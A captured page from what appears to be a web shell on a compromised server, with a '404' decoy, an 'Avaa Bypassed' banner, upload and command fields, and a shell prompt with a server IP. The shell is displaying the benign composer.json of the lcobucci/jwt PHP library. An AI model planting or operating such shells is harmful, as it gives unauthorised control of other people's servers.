404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.119.112.143: ~ $
{
    "name": "lcobucci/jwt",
    "description": "A simple library to work with JSON Web Token and JSON Web Signature",
    "license": [
        "BSD-3-Clause"
    ],
    "type": "library",
    "keywords": [
        "JWT",
        "JWS"
    ],
    "authors": [
        {
            "name": "Luís Cobucci",
            "email": "lcobucci@gmail.com",
            "role": "Developer"
        }
    ],
    "require": {
        "php": "~8.1.0 || ~8.2.0",
        "ext-hash": "*",
        "ext-json": "*",
        "ext-openssl": "*",
        "ext-sodium": "*",
        "psr/clock": "^1.0"
    },
    "require-dev": {
        "infection/infection": "^0.26.19",
        "lcobucci/clock": "^3.0",
        "lcobucci/coding-standard": "^9.0",
        "phpbench/phpbench": "^1.2.8",
        "phpstan/extension-installer": "^1.2",
        "phpstan/phpstan": "^1.10.3",
        "phpstan/phpstan-deprecation-rules": "^1.1.2",
        "phpstan/phpstan-phpunit": "^1.3.8",
        "phpstan/phpstan-strict-rules": "^1.5.0",
        "phpunit/phpunit": "^10.0.12"
    },
    "suggest": {
        "lcobucci/clock": ">= 3.0"
    },
    "autoload": {
        "psr-4": {
            "Lcobucci\\JWT\\": "src"
        }
    },
    "autoload-dev": {
        "psr-4": {
            "Lcobucci\\JWT\\Tests\\": "tests"
        }
    },
    "config": {
        "allow-plugins": {
            "dealerdirect/phpcodesniffer-composer-installer": true,
            "phpstan/extension-installer": true,
            "infection/extension-installer": true,
            "ocramius/package-versions": true
        },
        "platform": {
            "php": "8.1.99"
        },
        "preferred-install": "dist",
        "sort-packages": true
    }
}

Filemanager

Name Type Size Permission Actions
src Folder 0755
LICENSE File 1.45 KB 0644
composer.json File 1.67 KB 0644
renovate.json File 144 B 0644